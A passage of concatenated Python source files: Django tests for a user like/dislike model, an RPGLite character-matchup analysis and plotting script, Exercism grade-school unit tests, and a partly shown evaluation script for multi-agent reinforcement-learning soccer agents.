Like.give_like(test_user_one, test_user_two)
test_like, created = Like.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_like), "JoshD is liked by 1 users!")
""" Tests the string function of the Dislike model """
class DislikeStrTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
test_dislike, created = Dislike.objects.get_or_create(current_user=test_user_one)
test_dislike.users.add(test_user_two)
test_dislike_dos, created = Dislike.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_dislike_dos), "JoshD is disliked by 1 users!")
""" Tests the give_dislike function of the Dislike model """
class GiveDislikeTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
Dislike.give_dislike(test_user_one, test_user_two)
test_dislike, created = Dislike.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_dislike), "JoshD is disliked by 1 users!")
""" Tests after liking another User, if there had been a previous dislike from
current user to the liked user, the dislike is removed."""
class RemoveDislikeIfLikeTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
Dislike.give_dislike(test_user_one, test_user_two)
Like.give_like(test_user_one, test_user_two)
test_dislike, created = Dislike.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_dislike), "JoshD is disliked by 0 users!")
""" Tests after disliking another User, if there had been a previous like from
current user to the disliked user, the like is removed."""
class RemoveLikeIfDislikeTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
Like.give_like(test_user_one, test_user_two)
Dislike.give_dislike(test_user_one, test_user_two)
test_like, created = Like.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_like), "JoshD is liked by 0 users!")
""" Tests if no more than one like can be made from one user to another """
class OnlyOneLikeTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
Like.give_like(test_user_one, test_user_two)
Like.give_like(test_user_one, test_user_two)
Like.give_like(test_user_one, test_user_two)
Like.give_like(test_user_one, test_user_two)
Like.give_like(test_user_one, test_user_two)
test_like, created = Like.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_like), "JoshD is liked by 1 users!")
""" Tests if no more than one dislike can be made from one user to another """
class OnlyOneDislikeTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
Dislike.give_dislike(test_user_one, test_user_two)
Dislike.give_dislike(test_user_one, test_user_two)
Dislike.give_dislike(test_user_one, test_user_two)
Dislike.give_dislike(test_user_one, test_user_two)
Dislike.give_dislike(test_user_one, test_user_two)
test_dislike, created = Dislike.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_dislike), "JoshD is disliked by 1 users!")
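# For reference, a sketch of the Like.give_like these assertions imply (the
# real implementation lives in .models and may differ; kept as a comment so
# nothing here shadows it):
#
#     @classmethod
#     def give_like(cls, current_user, other_user):
#         like, _ = cls.objects.get_or_create(current_user=current_user)
#         like.users.add(other_user)        # no-op on repeats (OnlyOneLikeTest)
#         dislike, _ = Dislike.objects.get_or_create(current_user=current_user)
#         dislike.users.remove(other_user)  # RemoveDislikeIfLikeTest behaviour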
(numeric per-file metric columns omitted)
463205a22e0f79a420196e3a5a9a4536c4ab25c9 | 5,225 | py | Python | metagame_character_results.py | RPGLite/analysis | 13f683beb26d77c6f7ae7de54808b0cb5acb9eee | ["MIT"] | null | null | null | metagame_character_results.py | RPGLite/analysis | 13f683beb26d77c6f7ae7de54808b0cb5acb9eee | ["MIT"] | 1 | 2020-11-27T14:38:33.000Z | 2020-11-27T14:38:33.000Z | metagame_character_results.py | RPGLite/analysis | 13f683beb26d77c6f7ae7de54808b0cb5acb9eee | ["MIT"] | null | null | null |
from helper_fns import *
import numpy as np
import matplotlib.pyplot as plt
import math, pymongo
from bson import objectid
results = np.zeros((8, 8), dtype=int)  # 8x8 win counts, row beats column
for g in db.completed_games.find({"winner":{"$exists":True}, "balance_code":"1.2"}):
if g["winner"] == 1:
results[chars.index(g["p1c1"][0])][chars.index(g["p2c1"][0])] += 1
results[chars.index(g["p1c1"][0])][chars.index(g["p2c2"][0])] += 1
results[chars.index(g["p1c2"][0])][chars.index(g["p2c1"][0])] += 1
results[chars.index(g["p1c2"][0])][chars.index(g["p2c2"][0])] += 1
else:
results[chars.index(g["p2c1"][0])][chars.index(g["p1c1"][0])] += 1
results[chars.index(g["p2c1"][0])][chars.index(g["p1c2"][0])] += 1
results[chars.index(g["p2c2"][0])][chars.index(g["p1c1"][0])] += 1
results[chars.index(g["p2c2"][0])][chars.index(g["p1c2"][0])] += 1
ratios = np.zeros((8, 8))  # win ratio of row character vs column character
for r in range(len(results)):
for c in range(len(results[r])):
ratios[r][c] = results[r][c] / (results[r][c] + results[c][r])
fig, (ax,ax2) = plt.subplots(1,2, sharey=True, figsize=(16,10), gridspec_kw={'width_ratios': [3, 1]})
im = ax.imshow(ratios)
ax.set_xticks(np.arange(8))
ax.set_yticks(np.arange(8))
ax.set_yticklabels([full_name(c) for c in chars])
ax.set_xticklabels(chars)
for i in range(8):
for j in range(8):
text = ax.text(j, i, "{:.2f}".format(ratios[i, j]),
ha="center", va="center", color="w" if ratios[i,j] < 0.51 else "b")
times_played = np.array([[0],[0],[0],[0],[0],[0],[0],[0]])
for c in range(8):
times_played[c] = [sum(results[c])]
ax.set_title("s2-matchups")
ax2.set_title("s2-times played")
ax2.set_xticks([0]) # turn xticks off for popularity
ax2.set_xticklabels(["# played"])
im2 = ax2.imshow(times_played)
for j in range(8):
text = ax2.text(0, j, times_played[j, 0],
ha="center", va="center", color="w" if times_played[j,0] < np.average([times_played[x][0] for x in range(8)]) else "b")
results = np.zeros((8, 8), dtype=int)  # reset counts for the season-1 pass
for g in db.completed_games.find({"winner":{"$exists":True}, "balance_code":{"$exists":False}}):
if g["winner"] == 1:
results[chars.index(g["p1c1"][0])][chars.index(g["p2c1"][0])] += 1
results[chars.index(g["p1c1"][0])][chars.index(g["p2c2"][0])] += 1
results[chars.index(g["p1c2"][0])][chars.index(g["p2c1"][0])] += 1
results[chars.index(g["p1c2"][0])][chars.index(g["p2c2"][0])] += 1
else:
results[chars.index(g["p2c1"][0])][chars.index(g["p1c1"][0])] += 1
results[chars.index(g["p2c1"][0])][chars.index(g["p1c2"][0])] += 1
results[chars.index(g["p2c2"][0])][chars.index(g["p1c1"][0])] += 1
results[chars.index(g["p2c2"][0])][chars.index(g["p1c2"][0])] += 1
ratios = np.zeros((8, 8))  # win ratios for the season-1 pass
for r in range(len(results)):
for c in range(len(results[r])):
ratios[r][c] = results[r][c] / (results[r][c] + results[c][r])
fig2, (_ax,_ax2) = plt.subplots(1,2, sharey=True, figsize=(16,10), gridspec_kw={'width_ratios': [3, 1]})
im = _ax.imshow(ratios)
_ax.set_xticks(np.arange(8))
_ax.set_yticks(np.arange(8))
_ax.set_yticklabels([full_name(c) for c in chars])
_ax.set_xticklabels(chars)
for i in range(8):
for j in range(8):
text = _ax.text(j, i, "{:.2f}".format(ratios[i, j]),
ha="center", va="center", color="w" if ratios[i,j] < 0.51 else "b")
times_played = np.array([[0],[0],[0],[0],[0],[0],[0],[0]])
for c in range(8):
times_played[c] = [sum(results[c])]
_ax.set_title("s1-matchups")
_ax2.set_title("s1-times played")
_ax2.set_xticks([0]) # turn xticks off for popularity
_ax2.set_xticklabels(["# played"])
im2 = _ax2.imshow(times_played)
for j in range(8):
text = _ax2.text(0, j, times_played[j, 0],
ha="center", va="center", color="w" if times_played[j,0] < np.average([times_played[x][0] for x in range(8)]) else "b")
plt.tight_layout()
plt.show()
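# The two season blocks above are identical except for the Mongo filter and
# the plot titles; the shared tally/ratio logic could be factored as below
# (a sketch; the helper name and signature are not from the original script):
def matchup_ratios(extra_query):
    counts = np.zeros((8, 8), dtype=int)
    for g in db.completed_games.find({"winner": {"$exists": True}, **extra_query}):
        win, lose = ("p1", "p2") if g["winner"] == 1 else ("p2", "p1")
        for a in ("c1", "c2"):
            for b in ("c1", "c2"):
                counts[chars.index(g[win + a][0])][chars.index(g[lose + b][0])] += 1
    with np.errstate(invalid='ignore'):  # an unplayed matchup yields NaN instead of crashing
        return counts, counts / (counts + counts.T)
# e.g. counts_s2, ratios_s2 = matchup_ratios({"balance_code": "1.2"})
#      counts_s1, ratios_s1 = matchup_ratios({"balance_code": {"$exists": False}})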
(numeric per-file metric columns omitted)
4672efe88ee10b0cf6d782d73fdeca994d616001 | 6,848 | py | Python | exercises/practice/grade-school/grade_school_test.py | tamireinhorn/python | 027e94759dd3281b0633c82171e377a28dc5a92e | ["MIT"] | 1,177 | 2017-06-21T20:24:06.000Z | 2022-03-29T02:30:55.000Z | exercises/practice/grade-school/grade_school_test.py | tamireinhorn/python | 027e94759dd3281b0633c82171e377a28dc5a92e | ["MIT"] | 1,890 | 2017-06-18T20:06:10.000Z | 2022-03-31T18:35:51.000Z | exercises/practice/grade-school/grade_school_test.py | stigjb-forks/exercism-python | cfb620d1603eb9b08511f96f00f872c67cac0d05 | ["MIT"] | 1,095 | 2017-06-26T23:06:19.000Z | 2022-03-29T03:25:38.000Z |
import unittest
from grade_school import (
School,
)
# Tests adapted from `problem-specifications//canonical-data.json`
class GradeSchoolTest(unittest.TestCase):
def test_roster_is_empty_when_no_student_is_added(self):
school = School()
expected = []
self.assertEqual(school.roster(), expected)
def test_add_a_student(self):
school = School()
school.add_student(name="Aimee", grade=2)
expected = [True]
self.assertEqual(school.added(), expected)
def test_student_is_added_to_the_roster(self):
school = School()
school.add_student(name="Aimee", grade=2)
expected = ["Aimee"]
self.assertEqual(school.roster(), expected)
def test_adding_multiple_students_in_the_same_grade_in_the_roster(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="Paul", grade=2)
expected = [True, True, True]
self.assertEqual(school.added(), expected)
def test_multiple_students_in_the_same_grade_are_added_to_the_roster(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="Paul", grade=2)
expected = ["Blair", "James", "Paul"]
self.assertEqual(school.roster(), expected)
def test_cannot_add_student_to_same_grade_in_the_roster_more_than_once(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="Paul", grade=2)
expected = [True, True, False, True]
self.assertEqual(school.added(), expected)
def test_student_not_added_to_same_grade_in_the_roster_more_than_once(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="Paul", grade=2)
expected = ["Blair", "James", "Paul"]
self.assertEqual(school.roster(), expected)
def test_adding_students_in_multiple_grades(self):
school = School()
school.add_student(name="Chelsea", grade=3)
school.add_student(name="Logan", grade=7)
expected = [True, True]
self.assertEqual(school.added(), expected)
def test_students_in_multiple_grades_are_added_to_the_roster(self):
school = School()
school.add_student(name="Chelsea", grade=3)
school.add_student(name="Logan", grade=7)
expected = ["Chelsea", "Logan"]
self.assertEqual(school.roster(), expected)
def test_cannot_add_same_student_to_multiple_grades_in_the_roster(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=3)
school.add_student(name="Paul", grade=3)
expected = [True, True, False, True]
self.assertEqual(school.added(), expected)
def test_student_not_added_to_multiple_grades_in_the_roster(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=3)
school.add_student(name="Paul", grade=3)
expected = ["Blair", "James", "Paul"]
self.assertEqual(school.roster(), expected)
def test_students_are_sorted_by_grades_in_the_roster(self):
school = School()
school.add_student(name="Jim", grade=3)
school.add_student(name="Peter", grade=2)
school.add_student(name="Anna", grade=1)
expected = ["Anna", "Peter", "Jim"]
self.assertEqual(school.roster(), expected)
def test_students_are_sorted_by_name_in_the_roster(self):
school = School()
school.add_student(name="Peter", grade=2)
school.add_student(name="Zoe", grade=2)
school.add_student(name="Alex", grade=2)
expected = ["Alex", "Peter", "Zoe"]
self.assertEqual(school.roster(), expected)
def test_students_are_sorted_by_grades_and_then_by_name_in_the_roster(self):
school = School()
school.add_student(name="Peter", grade=2)
school.add_student(name="Anna", grade=1)
school.add_student(name="Barb", grade=1)
school.add_student(name="Zoe", grade=2)
school.add_student(name="Alex", grade=2)
school.add_student(name="Jim", grade=3)
school.add_student(name="Charlie", grade=1)
expected = ["Anna", "Barb", "Charlie", "Alex", "Peter", "Zoe", "Jim"]
self.assertEqual(school.roster(), expected)
def test_grade_is_empty_if_no_students_in_the_roster(self):
school = School()
expected = []
self.assertEqual(school.grade(1), expected)
def test_grade_is_empty_if_no_students_in_that_grade(self):
school = School()
school.add_student(name="Peter", grade=2)
school.add_student(name="Zoe", grade=2)
school.add_student(name="Alex", grade=2)
school.add_student(name="Jim", grade=3)
expected = []
self.assertEqual(school.grade(1), expected)
def test_student_not_added_to_same_grade_more_than_once(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="Paul", grade=2)
expected = ["Blair", "James", "Paul"]
self.assertEqual(school.grade(2), expected)
def test_student_not_added_to_multiple_grades(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=3)
school.add_student(name="Paul", grade=3)
expected = ["Blair", "James"]
self.assertEqual(school.grade(2), expected)
def test_student_not_added_to_other_grade_for_multiple_grades(self):
school = School()
school.add_student(name="Blair", grade=2)
school.add_student(name="James", grade=2)
school.add_student(name="James", grade=3)
school.add_student(name="Paul", grade=3)
expected = ["Paul"]
self.assertEqual(school.grade(3), expected)
def test_students_are_sorted_by_name_in_a_grade(self):
school = School()
school.add_student(name="Franklin", grade=5)
school.add_student(name="Bradley", grade=5)
school.add_student(name="Jeff", grade=1)
expected = ["Bradley", "Franklin"]
self.assertEqual(school.grade(5), expected)
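# One School that satisfies the suite above (the exercise leaves the class to
# the solver; kept as a comment so the School imported under test is not
# shadowed):
#
#     class School:
#         def __init__(self):
#             self._grades = {}   # grade number -> sorted list of names
#             self._added = []    # outcome of each add_student call, in order
#
#         def add_student(self, name, grade):
#             enrolled = any(name in names for names in self._grades.values())
#             self._added.append(not enrolled)
#             if not enrolled:
#                 self._grades.setdefault(grade, []).append(name)
#                 self._grades[grade].sort()
#
#         def added(self):
#             return self._added
#
#         def roster(self):
#             return [n for g in sorted(self._grades) for n in self._grades[g]]
#
#         def grade(self, grade_number):
#             return list(self._grades.get(grade_number, []))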
(numeric per-file metric columns omitted)
d3b48b8fc813c976f77459ecd451ddba7b5ad966 | 25,501 | py | Python | eval.py | WeiChengTseng/DL_final_project | bbe61592a3d85c00731e254edcd1108075c49b6f | ["Apache-2.0"] | 7 | 2019-05-09T13:43:19.000Z | 2022-01-11T06:00:05.000Z | eval.py | WeiChengTseng/DL_final_project | bbe61592a3d85c00731e254edcd1108075c49b6f | ["Apache-2.0"] | null | null | null | eval.py | WeiChengTseng/DL_final_project | bbe61592a3d85c00731e254edcd1108075c49b6f | ["Apache-2.0"] | 4 | 2019-05-10T16:57:37.000Z | 2019-06-05T14:43:27.000Z |
import time
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from tensorboardX import SummaryWriter
from a2c.models import AtariCNN, A2C, A2CLarge
from a2c.envs import make_env, RenderSubprocVecEnv
from a2c.train_multi import train
from ppo.PPO import PPO
from maac.attention_sac import AttentionSAC
from maac_double.attention_sac import AttentionSACDouble
from env_exp import SocTwoEnv
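# parse_double splits the env's two stacked observation arrays (index 0:
# strikers, index 1: goalies; each stacking two populations of 8 agents)
# into four groups of 8: strikers A, goalies A, strikers B, goalies B.
# The A/B population reading is inferred from the [:8] / [8:] slicing below.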
def parse_double(obs):
parsed_obs = [None] * 4
parsed_obs[0] = obs[0][:8]
parsed_obs[2] = obs[0][8:]
parsed_obs[1] = obs[1][:8]
parsed_obs[3] = obs[1][8:]
return np.array(parsed_obs)
def eval_with_random_agent(net_striker,
net_goalie,
env,
device,
eval_epsoid=40):
obs_striker, obs_goalie = env.reset('team')
# time.sleep(5)
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
policies_striker, values_striker = net_striker(obs_striker)
policies_goalie, values_goalie = net_goalie(obs_goalie)
probs_striker = F.softmax(policies_striker, dim=-1)
probs_goalie = F.softmax(policies_goalie, dim=-1)
actions_striker = probs_striker.multinomial(1).data
actions_goalie = probs_goalie.multinomial(1).data
actions_striker = torch.cat([
torch.LongTensor(np.random.randint(0, 7, (8, 1))),
actions_striker[8:],
],
dim=0)
actions_goalie = torch.cat([
torch.LongTensor(np.random.randint(0, 5, (8, 1))),
actions_goalie[8:],
],
dim=0)
# actions_striker = torch.cat([
# actions_striker[:8],
# torch.LongTensor(np.random.randint(0, 7, (8, 1)))
# ],
# dim=0)
# actions_goalie = torch.cat([
# actions_goalie[:8],
# torch.LongTensor(np.random.randint(0, 5, (8, 1)))
# ],
# dim=0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
'team')
obs_striker, obs_goalie = obs
rewards_striker = torch.from_numpy(
rewards[0]).float().unsqueeze(1).to(device)
rewards_goalie = torch.from_numpy(
rewards[1]).float().unsqueeze(1).to(device)
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
return
def eval_self_complete(net_striker,
net_goalie,
env,
device,
order='team',
eval_epsoid=40):
obs_striker, obs_goalie = env.reset(order)
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
policies_striker, values_striker = net_striker(obs_striker)
policies_goalie, values_goalie = net_goalie(obs_goalie)
probs_striker = F.softmax(policies_striker, dim=-1)
probs_goalie = F.softmax(policies_goalie, dim=-1)
actions_striker = probs_striker.multinomial(1).data
actions_goalie = probs_goalie.multinomial(1).data
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
rewards_striker = torch.from_numpy(
rewards[0]).float().unsqueeze(1).to(device)
rewards_goalie = torch.from_numpy(
rewards[1]).float().unsqueeze(1).to(device)
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
return
def eval_self_striker_goalie(net_striker,
net_goalie,
env,
device,
order='team',
eval_epsoid=40):
obs_striker, obs_goalie = env.reset(order)
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
policies_striker, values_striker = net_striker(obs_striker)
policies_goalie, values_goalie = net_goalie(obs_goalie)
probs_striker = F.softmax(policies_striker, dim=-1)
probs_goalie = F.softmax(policies_goalie, dim=-1)
actions_striker = probs_striker.multinomial(1).data
actions_goalie = probs_goalie.multinomial(1).data
actions_striker = torch.cat([
actions_striker[:8],
torch.LongTensor(np.random.randint(0, 7, (8, 1)))
],
dim=0)
actions_goalie = torch.cat([
torch.LongTensor(np.random.randint(0, 5,
(8, 1))), actions_goalie[8:]
],
dim=0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
rewards_striker = torch.from_numpy(
rewards[0]).float().unsqueeze(1).to(device)
rewards_goalie = torch.from_numpy(
rewards[1]).float().unsqueeze(1).to(device)
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
return
def eval_agents_compete(strikers,
goalies,
env,
device,
order='team',
eval_epsoid=40):
obs_striker, obs_goalie = env.reset(order)
policies_striker = [None, None]
policies_goalie = [None, None]
# time.sleep(5)
records = [0] * 3
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
policies_striker[0], _ = strikers[0](obs_striker[:8])
policies_goalie[0], _ = goalies[0](obs_goalie[:8])
policies_striker[1], _ = strikers[1](obs_striker[8:])
policies_goalie[1], _ = goalies[1](obs_goalie[8:])
policy_strikers = torch.cat(policies_striker, dim=0)
policy_goalies = torch.cat(policies_goalie, dim=0)
probs_striker = F.softmax(policy_strikers, dim=-1)
probs_goalie = F.softmax(policy_goalies, dim=-1)
actions_striker = probs_striker.multinomial(1).data
actions_goalie = probs_goalie.multinomial(1).data
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
rewards_striker = torch.from_numpy(
rewards[0]).float().unsqueeze(1).to(device)
rewards_goalie = torch.from_numpy(
rewards[1]).float().unsqueeze(1).to(device)
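# Tally outcomes per finished episode. records appears to hold
# [side-A wins, side-B wins, other], judging by the reward signs:
# a negative goalie reward marks the side that conceded.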
for i in np.argwhere(dones[0][:8]).flatten():
epsoid += 1
if rewards[1][i + 8] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
print(records)
return
def eval_compete_acppo(strikers,
goalies,
env,
device,
order='team',
eval_epsoid=40):
# env.train()
obs_striker, obs_goalie = env.reset(order)
policies_striker = [None, None]
policies_goalie = [None, None]
# time.sleep(5)
records = [0] * 3
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
policies_striker[0], _ = strikers[0](obs_striker[:8])
policies_goalie[0], _ = goalies[0](obs_goalie[:8])
# policies_striker[1], _ = strikers[1](obs_striker[8:])
# policies_goalie[1], _ = goalies[1](obs_goalie[8:])
action_ppo_striker = strikers[1].act(obs_striker[8:])
action_ppo_goalie = goalies[1].act(obs_goalie[8:])
policy_strikers = policies_striker[0]
policy_goalies = policies_goalie[0]
probs_striker = F.softmax(policy_strikers, dim=-1)
probs_goalie = F.softmax(policy_goalies, dim=-1)
actions_striker = probs_striker.multinomial(1).data
actions_goalie = probs_goalie.multinomial(1).data
# print(actions_striker)
actions_striker = torch.cat((actions_striker, action_ppo_striker),
dim=0)
actions_goalie = torch.cat((actions_goalie, action_ppo_goalie), dim=0)
# random_act_striker = torch.LongTensor(np.random.randint(7, size=(8,1)))
# random_act_goalie = torch.LongTensor(np.random.randint(5, size=(8,1)))
# actions_striker = torch.cat((random_act_striker, action_ppo_striker), dim=0)
# actions_goalie = torch.cat((random_act_goalie, action_ppo_goalie), dim=0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
rewards_striker = torch.from_numpy(
rewards[0]).float().unsqueeze(1).to(device)
rewards_goalie = torch.from_numpy(
rewards[1]).float().unsqueeze(1).to(device)
for i in np.argwhere(dones[0][:8]).flatten():
epsoid += 1
if rewards[1][i + 8] < 0:
records[0] += 1
elif rewards[1][i] < 0:
records[1] += 1
else:
records[2] += 1
print(records)
return
def eval_agents_compete_(strikers,
goalies,
env,
device,
order='team',
eval_epsoid=40):
obs_striker, obs_goalie = env.reset(order)
actions_strikers = [None, None]
actions_goalies = [None, None]
records = [0, 0, 0]
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
actions_strikers[0], _ = strikers[0](obs_striker[:8])
actions_goalies[0], _ = goalies[0](obs_goalie[:8])
actions_strikers[1], _ = strikers[1](obs_striker[8:])
actions_goalies[1], _ = goalies[1](obs_goalie[8:])
actions_striker = torch.cat(actions_strikers, 0)
actions_goalie = torch.cat(actions_goalies, 0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
if rewards[1][i] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
return
def eval_maac_with_random(model_path, env, order='team', eval_epsoid=40):
maac = AttentionSAC.init_from_save(model_path)
obs_striker, obs_goalie = env.reset(order)
actions_strikers = [None, None]
actions_goalies = [None, None]
records = [0, 0, 0]
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
action_maac = maac.step((obs_striker, obs_goalie), explore=True)
# print(action_maac)
actions_strikers[0] = torch.argmax(action_maac[0][:8], dim=-1)
actions_goalies[0] = torch.argmax(action_maac[1][:8], dim=-1)
# print(actions_strikers[0])
actions_strikers[1] = torch.randint(7, size=(8, ))
actions_goalies[1] = torch.randint(5, size=(8, ))
# print(actions_strikers)
actions_striker = torch.cat(actions_strikers, 0)
actions_goalie = torch.cat(actions_goalies, 0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
if rewards[1][i] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
return
def eval_maac_self_compete(model_path, env, order='team', eval_epsoid=40):
maac = AttentionSAC.init_from_save(model_path)
obs_striker, obs_goalie = env.reset(order)
actions_strikers = [None, None]
actions_goalies = [None, None]
records = [0, 0, 0]
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
action_maac = maac.step((obs_striker, obs_goalie), explore=True)
# print(action_maac)
actions_strikers[0] = torch.argmax(action_maac[0], dim=-1)
actions_goalies[0] = torch.argmax(action_maac[1], dim=-1)
# print(actions_strikers[0])
# print(actions_strikers)
# actions_striker = torch.cat(actions_strikers, 0)
# actions_goalie = torch.cat(actions_goalies, 0)
obs, rewards, dones, _ = env.step(actions_strikers[0],
actions_goalies[0], order)
obs_striker, obs_goalie = obs
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
if rewards[1][i] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
    print(records)
    return records
def eval_maacac_compete(model_path,
strikers,
goalies,
env,
order='team',
eval_epsoid=200):
maac = AttentionSAC.init_from_save(model_path)
obs_striker, obs_goalie = env.reset(order)
actions_strikers = [None, None]
actions_goalies = [None, None]
records = [0, 0, 0]
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = Variable(
torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = Variable(torch.from_numpy(obs_goalie).float()).to(device)
action_maac = maac.step((obs_striker, obs_goalie), explore=True)
# print(action_maac)
actions_strikers[0] = torch.argmax(action_maac[0][:8], dim=-1)
actions_goalies[0] = torch.argmax(action_maac[1][:8], dim=-1)
# print(actions_strikers[0])
policy_strikers, _ = strikers(obs_striker[8:])
policy_goalies, _ = goalies(obs_goalie[8:])
probs_striker = F.softmax(policy_strikers, dim=-1)
probs_goalie = F.softmax(policy_goalies, dim=-1)
actions_strikers[1] = probs_striker.multinomial(1).data.flatten()
actions_goalies[1] = probs_goalie.multinomial(1).data.flatten()
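        # The A2C opponents act stochastically: actions are sampled from the
        # softmax of the policy logits rather than taken greedily, which
        # mirrors their behaviour during training.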
# print(actions_strikers)
actions_striker = torch.cat(actions_strikers, 0)
actions_goalie = torch.cat(actions_goalies, 0)
obs, rewards, dones, _ = env.step(actions_striker, actions_goalie,
order)
obs_striker, obs_goalie = obs
for i in np.argwhere(dones[0]).flatten():
epsoid += 1
if rewards[1][i] < 0:
records[0] += 1
elif rewards[0][i] < 0:
records[1] += 1
else:
records[2] += 1
    print(records)
    return records
def eval_maacdoubleac_compete(model_path,
strikers,
goalies,
env,
order='team',
eval_epsoid=200):
maac = AttentionSACDouble.init_from_save(model_path)
# obs_striker, obs_goalie = env.reset(order)
obs_striker, obs_goalie, obs_striker2, obs_goalie2 = parse_double(
env.reset(order))
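    # parse_double (defined earlier in this file) is assumed to split the
    # stacked reset/step observations into the two teams' striker and goalie
    # views: (obs_striker, obs_goalie) for team 0 and the *2 variants for
    # team 1.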
actions_strikers = [None, None]
actions_goalies = [None, None]
records = [0, 0, 0]
epsoid = 0
while epsoid < eval_epsoid:
obs_striker = (torch.from_numpy(obs_striker).float()).to(device)
obs_goalie = (torch.from_numpy(obs_goalie).float()).to(device)
obs_striker2 = (torch.from_numpy(obs_striker2).float()).to(device)
obs_goalie2 = (torch.from_numpy(obs_goalie2).float()).to(device)
action_maac = maac.step(
(obs_striker, obs_goalie, obs_striker2, obs_goalie2), explore=True)
# print(action_maac)
actions_strikers[0] = torch.argmax(action_maac[0], dim=-1)
